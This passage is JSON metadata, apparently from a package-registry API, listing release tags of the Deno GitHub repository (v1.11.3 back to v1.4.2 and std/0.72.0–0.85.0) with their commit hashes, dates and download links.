1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos